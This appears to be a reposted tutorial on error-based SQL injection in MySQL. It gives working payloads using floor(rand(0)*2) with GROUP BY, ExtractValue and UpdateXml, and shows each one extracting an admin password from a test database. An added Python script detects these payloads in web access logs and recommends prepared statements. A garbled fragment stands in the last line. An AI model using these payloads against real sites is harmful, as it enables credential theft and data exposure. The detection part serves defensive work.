Reposting some old notes. When MySQL fails to execute a statement it throws an error message, and PHP+MySQL sites often display that error text on the page, so the three methods below can be used to extract specific data through the error.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version was leaked in the error (the trailing 1 is the floor(rand(0)*2) value appended by concat()). To retrieve other data, replace the version() expression with a different subquery.
For example, to retrieve the administrator username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
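All three techniques above (the floor(rand(0)*2) + GROUP BY duplicate-key error, ExtractValue and UpdateXml) leave a recognizable combination of functions in the injected input, which makes them easy to flag in web access logs before the database ever reports an error. The following Python script is an added example, not code from the original post: it assumes a simple access-log format (client IP, then the quoted request line, then status) and runs over constructed sample lines that carry the post's own payloads URL-encoded.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (assumed format: client IP, then the
# quoted request line, then status). Not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - "GET /article.php?id=1 HTTP/1.1" 200
10.0.0.9 - - "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500
10.0.0.9 - - "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500
10.0.0.9 - - "GET /article.php?id=1+and+1%3D(updatexml(1,concat(0x5e24,(select+user()),0x5e24),1)) HTTP/1.1" 500
10.0.0.7 - - "GET /article.php?id=42&title=floor+plan HTTP/1.1" 200
"""

# One signature per technique in the post. Every regex in a tuple must match,
# so a lone keyword such as "floor" in ordinary input does not fire.
SIGNATURES = {
    "floor_rand_groupby": (r"\bfloor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", r"\bgroup\s+by\b"),
    "extractvalue": (r"\bextractvalue\s*\(", r"\bconcat\s*\("),
    "updatexml": (r"\bupdatexml\s*\(", r"\bconcat\s*\("),
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in SIGNATURES.items()}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify_request(raw_target):
    """Return the signature names matched by one request target (path + query)."""
    decoded = unquote_plus(raw_target)  # '+' -> space, %xx -> char, as the app would see it
    return [name for name, rxs in COMPILED.items() if all(rx.search(decoded) for rx in rxs)]


def scan_log(text):
    """Return (client_ip, matched_signatures) for every log line that trips a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        matched = classify_request(m.group(1))
        if matched:
            hits.append((line.split()[0], matched))
    return hits


if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG):
        print(f"{ip}: error-based injection attempt ({', '.join(names)})")
```

The check runs on the percent-decoded request target, so the encoded form a browser actually sends is matched too, and it does not depend on the HTTP status. The durable fix on the PHP side remains prepared statements together with error display turned off.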
7 ~9 S) p9 ]& h9 g: rAll, thanks foreign guys.